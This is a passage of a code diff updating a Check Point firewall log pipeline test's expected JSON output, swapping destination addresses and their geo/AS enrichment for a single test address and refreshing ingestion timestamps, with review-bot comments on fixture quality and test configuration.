a/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint.log-expected.json b/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint.log-expected.json index 8d2dc7757c1..0d89f653dc7 100644 --- a/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint.log-expected.json +++ b/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint.log-expected.json 
@@ -21,7 +21,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-06-30T09:24:17.958617400Z", + "ingested": "2021-12-09T13:31:19.083259700Z", "original": "\u003c134\u003e1 2020-03-29T13:19:20Z gw-da58d3 CheckPoint 1930 - [flags:\"133440\"; ifdir:\"inbound\"; ifname:\"daemon\"; loguid:\"{0x5e80a059,0x0,0x6401a8c0,0x3c7878a}\"; origin:\"192.168.1.100\"; sequencenum:\"1\"; version:\"5\"; product:\"System Monitor\"; sys_message::\"The eth0 interface is not protected by the anti-spoofing feature. Your network may be at risk\"]", "id": "{0x5e80a059,0x0,0x6401a8c0,0x3c7878a}", "category": [ @@ -57,7 +57,7 @@ }, "event": { "sequence": 2, - "ingested": "2021-06-30T09:24:17.958627500Z", + "ingested": "2021-12-09T13:31:19.083263700Z", "original": "\u003c134\u003e1 2020-03-29T13:19:21Z gw-da58d3 CheckPoint 1930 - [flags:\"133440\"; ifdir:\"inbound\"; ifname:\"daemon\"; loguid:\"{0x5e80a059,0x2,0x6401a8c0,0x3c7878a}\"; origin:\"192.168.1.100\"; sequencenum:\"2\"; version:\"5\"; product:\"System Monitor\"; sys_message::\"installed Standard\"]", "id": "{0x5e80a059,0x2,0x6401a8c0,0x3c7878a}", "category": [ 
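Review bot: The `event.ingested` replacements in this hunk (and in the -57, -126, -287, -320, -523, -681, -714, -783, -817, -851, -920, -1058 and -1127 hunks of this file) are wall-clock values from the regeneration run rather than behaviour under test, so they will churn on every regeneration and bury the real change in this file — the destination address — in timestamp noise. elastic-package's pipeline test config can mark such fields as dynamic; something like `dynamic_fields: {event.ingested: ".*"}` in this data stream's test config would let the comparison ignore them, if the package does not already do so elsewhere. Until then a reviewer has to take on trust that only the timestamp moved in each of those hunks, which is hard to verify at this line width.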
@@ -126,7 +126,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-06-30T09:24:17.958635200Z", + "ingested": "2021-12-09T13:31:19.083267900Z", "original": "\u003c134\u003e1 2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e80a05a,0x0,0x60e0fe3b,0xda019994}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\\]\"; dst:\"192.168.1.1\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"Internal\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"46915\"; service:\"53\"; service_id:\"domain-udp\"; src:\"192.168.1.100\"]", "kind": "event", "action": "Accept", @@ -152,25 +152,25 @@ }, "destination": { "geo": { - "continent_name": "Asia", - "region_iso_code": "IL-TA", - "city_name": "Tel Aviv", - "country_iso_code": "IL", - "country_name": "Israel", - "region_name": "Tel Aviv", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 34.7647, - "lat": 32.0678 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 25046, + "number": 20712, "organization": { - "name": "Check Point Software Technologies LTD" + "name": "Andrews \u0026 Arnold Ltd" } }, "port": 443, - "ip": "194.29.39.10" + "ip": "81.2.69.144" }, "rule": { "uuid": "1fde807b-6300-4b1a-914f-f1c1f3e2e7d2" 
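Review bot: In the -152 hunk (and likewise -346, -435, -549 and -944, with the matching `related.ip` updates at -213, -404, -486, -607 and -989) five previously distinct destination addresses — different hosts, different ports, one of them the Drop event — all become `81.2.69.144`, so every destination.geo and destination.as block in the expected file is now identical. That weakens the fixture: a regression that swapped or duplicated destination enrichment between events would no longer change the expected output, because there is nothing left to tell the documents apart on the destination side. If more than one supported test address is available, spreading at least two of them across these events would keep that discriminating power while still avoiding real public addresses.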
@@ -213,13 +213,13 @@ "related": { "ip": [ "192.168.1.100", - "194.29.39.10" + "81.2.69.144" ] }, "event": { "sequence": 2, - "ingested": "2021-06-30T09:24:17.958642500Z", - "original": "\u003c134\u003e1 2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e80a05a,0x0,0xbba3afa,0xd2c10858}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"2\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\\]\"; dst:\"194.29.39.10\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; nat_addtnl_rulenum:\"0\"; nat_rulenum:\"0\"; outzone:\"Internal\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"6\"; s_port:\"61794\"; service:\"443\"; service_id:\"https\"; src:\"192.168.1.100\"; xlatedport:\"0\"; xlatedst:\"0.0.0.0\"; xlatesport:\"26680\"; xlatesrc:\"0.0.0.0\"]", + "ingested": "2021-12-09T13:31:19.083271700Z", + "original": "\u003c134\u003e1 2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e80a05a,0x0,0xbba3afa,0xd2c10858}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"2\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\\]\"; dst:\"81.2.69.144\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; nat_addtnl_rulenum:\"0\"; nat_rulenum:\"0\"; outzone:\"Internal\"; 
product:\"VPN-1 \u0026 FireWall-1\"; proto:\"6\"; s_port:\"61794\"; service:\"443\"; service_id:\"https\"; src:\"192.168.1.100\"; xlatedport:\"0\"; xlatedst:\"0.0.0.0\"; xlatesport:\"26680\"; xlatesrc:\"0.0.0.0\"]", "kind": "event", "action": "Accept", "id": "{0x5e80a05a,0x0,0xbba3afa,0xd2c10858}", @@ -287,7 +287,7 @@ }, "event": { "sequence": 3, - "ingested": "2021-06-30T09:24:17.958649800Z", + "ingested": "2021-12-09T13:31:19.083278100Z", "original": "\u003c134\u003e1 2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e80a05a,0x0,0x1cae0484,0xf99c33e9}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"3\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\\]\"; dst:\"192.168.1.1\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"Internal\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"36749\"; service:\"53\"; service_id:\"domain-udp\"; src:\"192.168.1.100\"]", "kind": "event", "action": "Accept", @@ -320,7 +320,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-06-30T09:24:17.958691800Z", + "ingested": "2021-12-09T13:31:19.083282500Z", "original": "\u003c134\u003e1 2020-03-29T23:18:44Z gw-da58d3 CheckPoint 8363 - [flags:\"133440\"; ifdir:\"inbound\"; loguid:\"{0x5e812cd4,0x1,0x6401a8c0,0x108620ab}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; comment:\"No update was found\"; description:\"Contracts\"; product:\"Security Gateway/Management\"; status:\"Finished\"; update_service:\"1\"; version:\"1.0\"]", "id": "{0x5e812cd4,0x1,0x6401a8c0,0x108620ab}", "category": [ 
@@ -346,22 +346,25 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 30148, + "number": 20712, "organization": { - "name": "Sucuri" + "name": "Andrews \u0026 Arnold Ltd" } }, "port": 80, - "ip": "192.124.249.41" + "ip": "81.2.69.144" }, "rule": { "uuid": "1fde807b-6300-4b1a-914f-f1c1f3e2e7d2" 
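Review bot: The new destination.geo and destination.as values in this hunk (Abingdon/Oxfordshire, AS 20712, also in -152, -435, -549 and -944) look like they come from the GeoIP test fixture the pipeline test runner uses rather than from a production database; if so, anyone regenerating this file against a real GeoLite2 database will get different values and a confusing failure. Nothing in the package records that dependency. A one-line note in the data stream's test README, or in the changelog entry, saying that these addresses are resolved against the runner's bundled test GeoIP database would save the next maintainer a round of investigation; please verify the fixture source against the runner configuration before wording it.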
@@ -404,13 +407,13 @@ "related": { "ip": [ "192.168.1.100", - "192.124.249.41" + "81.2.69.144" ] }, "event": { "sequence": 8, - "ingested": "2021-06-30T09:24:17.958701800Z", - "original": "\u003c134\u003e1 2020-03-29T23:18:43Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e812cd3,0x6,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"8\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.124.249.41\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; nat_addtnl_rulenum:\"0\"; nat_rulenum:\"0\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"6\"; s_port:\"61180\"; service:\"80\"; service_id:\"http\"; src:\"192.168.1.100\"; xlatedport:\"0\"; xlatedst:\"0.0.0.0\"; xlatesport:\"10860\"; xlatesrc:\"0.0.0.0\"]", + "ingested": "2021-12-09T13:31:19.083286800Z", + "original": "\u003c134\u003e1 2020-03-29T23:18:43Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e812cd3,0x6,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"8\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"81.2.69.144\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; nat_addtnl_rulenum:\"0\"; nat_rulenum:\"0\"; outzone:\"External\"; 
product:\"VPN-1 \u0026 FireWall-1\"; proto:\"6\"; s_port:\"61180\"; service:\"80\"; service_id:\"http\"; src:\"192.168.1.100\"; xlatedport:\"0\"; xlatedst:\"0.0.0.0\"; xlatesport:\"10860\"; xlatesrc:\"0.0.0.0\"]", "kind": "event", "action": "Accept", "id": "{0x5e812cd3,0x6,0x353707c7,0xee78a1dc}", @@ -435,22 +438,25 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, "port": 53, - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "rule": { "uuid": "1fde807b-6300-4b1a-914f-f1c1f3e2e7d2" 
@@ -486,13 +492,13 @@ "related": { "ip": [ "192.168.2.2", - "8.8.8.8" + "81.2.69.144" ] }, "event": { "sequence": 1, - "ingested": "2021-06-30T09:24:17.958709500Z", - "original": "\u003c134\u003e1 2020-03-29T23:18:53Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; conn_direction:\"Outgoing\"; flags:\"6703366\"; ifdir:\"inbound\"; ifname:\"eth1\"; logid:\"0\"; loguid:\"{0x5e812cdd,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"8.8.8.8\"; log_delay:\"1585523933\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"55039\"; service:\"53\"; service_id:\"domain-udp\"; src:\"192.168.2.2\"]", + "ingested": "2021-12-09T13:31:19.083347300Z", + "original": "\u003c134\u003e1 2020-03-29T23:18:53Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; conn_direction:\"Outgoing\"; flags:\"6703366\"; ifdir:\"inbound\"; ifname:\"eth1\"; logid:\"0\"; loguid:\"{0x5e812cdd,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"81.2.69.144\"; log_delay:\"1585523933\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"55039\"; service:\"53\"; service_id:\"domain-udp\"; src:\"192.168.2.2\"]", "kind": "event", "action": 
"Accept", "id": "{0x5e812cdd,0x0,0x353707c7,0xee78a1dc}", @@ -523,7 +529,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-06-30T09:24:17.958716900Z", + "ingested": "2021-12-09T13:31:19.083353400Z", "original": "\u003c134\u003e1 2020-03-30T01:18:44Z gw-da58d3 CheckPoint 8363 - [flags:\"133440\"; ifdir:\"inbound\"; loguid:\"{0x5e8148f5,0x0,0x6401a8c0,0x108620ab}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; description:\"Contracts\"; product:\"Security Gateway/Management\"; status:\"Started\"; update_service:\"1\"; version:\"1.0\"]", "id": "{0x5e8148f5,0x0,0x6401a8c0,0x108620ab}", "category": [ @@ -549,22 +555,25 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 30148, + "number": 20712, "organization": { - "name": "Sucuri" + "name": "Andrews \u0026 Arnold Ltd" } }, "port": 80, - "ip": "192.124.249.36" + "ip": "81.2.69.144" }, "rule": { "uuid": "1fde807b-6300-4b1a-914f-f1c1f3e2e7d2" 
@@ -607,13 +616,13 @@ "related": { "ip": [ "192.168.1.100", - "192.124.249.36" + "81.2.69.144" ] }, "event": { "sequence": 2, - "ingested": "2021-06-30T09:24:17.958724200Z", - "original": "\u003c134\u003e1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e8148f6,0x1,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"2\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.124.249.36\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; nat_addtnl_rulenum:\"0\"; nat_rulenum:\"0\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"6\"; s_port:\"51894\"; service:\"80\"; service_id:\"http\"; src:\"192.168.1.100\"; xlatedport:\"0\"; xlatedst:\"0.0.0.0\"; xlatesport:\"11157\"; xlatesrc:\"0.0.0.0\"]", + "ingested": "2021-12-09T13:31:19.083357600Z", + "original": "\u003c134\u003e1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e8148f6,0x1,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"2\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"81.2.69.144\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; nat_addtnl_rulenum:\"0\"; nat_rulenum:\"0\"; outzone:\"External\"; 
product:\"VPN-1 \u0026 FireWall-1\"; proto:\"6\"; s_port:\"51894\"; service:\"80\"; service_id:\"http\"; src:\"192.168.1.100\"; xlatedport:\"0\"; xlatedst:\"0.0.0.0\"; xlatesport:\"11157\"; xlatesrc:\"0.0.0.0\"]", "kind": "event", "action": "Accept", "id": "{0x5e8148f6,0x1,0x353707c7,0xee78a1dc}", @@ -681,7 +690,7 @@ }, "event": { "sequence": 3, - "ingested": "2021-06-30T09:24:17.958731600Z", + "ingested": "2021-12-09T13:31:19.083362200Z", "original": "\u003c134\u003e1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e8148f6,0x2,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"3\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.1\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"47919\"; service:\"53\"; service_id:\"domain-udp\"; src:\"192.168.1.100\"]", "kind": "event", "action": "Accept", @@ -714,7 +723,7 @@ }, "event": { "sequence": 5, - "ingested": "2021-06-30T09:24:17.958739300Z", + "ingested": "2021-12-09T13:31:19.083366500Z", "original": "\u003c134\u003e1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [flags:\"133440\"; ifdir:\"inbound\"; loguid:\"{0x5e8148f7,0x0,0x6401a8c0,0x108620ab}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"5\"; version:\"5\"; comment:\"No update was found\"; description:\"Contracts\"; product:\"Security Gateway/Management\"; status:\"Finished\"; update_service:\"1\"; version:\"1.0\"]", "id": "{0x5e8148f7,0x0,0x6401a8c0,0x108620ab}", "category": [ 
@@ -783,7 +792,7 @@ }, "event": { "sequence": 13, - "ingested": "2021-06-30T09:24:17.958746800Z", + "ingested": "2021-12-09T13:31:19.083393500Z", "original": "\u003c134\u003e1 2020-03-30T06:12:45Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e818ddd,0xc,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"13\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.153\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"43103\"; service:\"514\"; service_id:\"syslog\"; src:\"192.168.1.100\"]", "kind": "event", "action": "Accept", @@ -817,7 +826,7 @@ "event": { "severity": 1, "sequence": 1, - "ingested": "2021-06-30T09:24:17.958754300Z", + "ingested": "2021-12-09T13:31:19.083397600Z", "original": "\u003c134\u003e1 2020-03-30T06:12:51Z gw-da58d3 CheckPoint 8363 - [flags:\"166216\"; ifdir:\"outbound\"; loguid:\"{0x5e818de4,0x0,0x6401a8c0,0x108620ab}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; db_ver:\"20033003\"; description:\"Gateway was updated with database version: 22032001.\"; product:\"Application Control\"; severity:\"1\"; update_status:\"updated\"]", "kind": "event", "id": "{0x5e818de4,0x0,0x6401a8c0,0x108620ab}", 
@@ -851,7 +860,7 @@ "event": { "severity": 1, "sequence": 2, - "ingested": "2021-06-30T09:24:17.958761700Z", + "ingested": "2021-12-09T13:31:19.083401900Z", "original": "\u003c134\u003e1 2020-03-30T06:12:51Z gw-da58d3 CheckPoint 8363 - [flags:\"166216\"; ifdir:\"outbound\"; loguid:\"{0x5e818de4,0x1,0x6401a8c0,0x108620ab}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"2\"; version:\"5\"; db_ver:\"20033003\"; description:\"Gateway was updated with database version: 22032001.\"; product:\"URL Filtering\"; severity:\"1\"; update_status:\"updated\"]", "kind": "event", "id": "{0x5e818de4,0x1,0x6401a8c0,0x108620ab}", @@ -920,7 +929,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-06-30T09:24:17.958768900Z", + "ingested": "2021-12-09T13:31:19.083405700Z", "original": "\u003c134\u003e1 2020-03-30T06:13:21Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"411908\"; ifdir:\"inbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e818e01,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.255\"; inzone:\"External\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"Local\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"138\"; service:\"138\"; service_id:\"nbdatagram\"; src:\"192.168.1.1\"]", "kind": "event", "action": "Accept", 
@@ -944,21 +953,24 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "France", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 2.3387, - "lat": 48.8582 - }, - "country_iso_code": "FR" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 16625, + "number": 20712, "organization": { - "name": "Akamai Technologies, Inc." + "name": "Andrews \u0026 Arnold Ltd" } }, "port": 80, - "ip": "2.21.41.118" + "ip": "81.2.69.144" }, "source": { "port": 65488, 
@@ -989,13 +1001,13 @@ "related": { "ip": [ "192.168.1.100", - "2.21.41.118" + "81.2.69.144" ] }, "event": { "sequence": 1, - "ingested": "2021-06-30T09:24:17.958776600Z", - "original": "\u003c134\u003e1 2020-03-30T06:13:42Z gw-da58d3 CheckPoint 8363 - [action:\"Drop\"; flags:\"425984\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"1\"; loguid:\"{0x5e818e17,0x0,0x6401a8c0,0x108620ab}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"2.21.41.118\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"6\"; s_port:\"65488\"; service:\"80\"; src:\"192.168.1.100\"; tcp_flags:\"FIN-ACK\"; tcp_packet_out_of_state:\"First packet isn't SYN\"]", + "ingested": "2021-12-09T13:31:19.083411200Z", + "original": "\u003c134\u003e1 2020-03-30T06:13:42Z gw-da58d3 CheckPoint 8363 - [action:\"Drop\"; flags:\"425984\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"1\"; loguid:\"{0x5e818e17,0x0,0x6401a8c0,0x108620ab}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 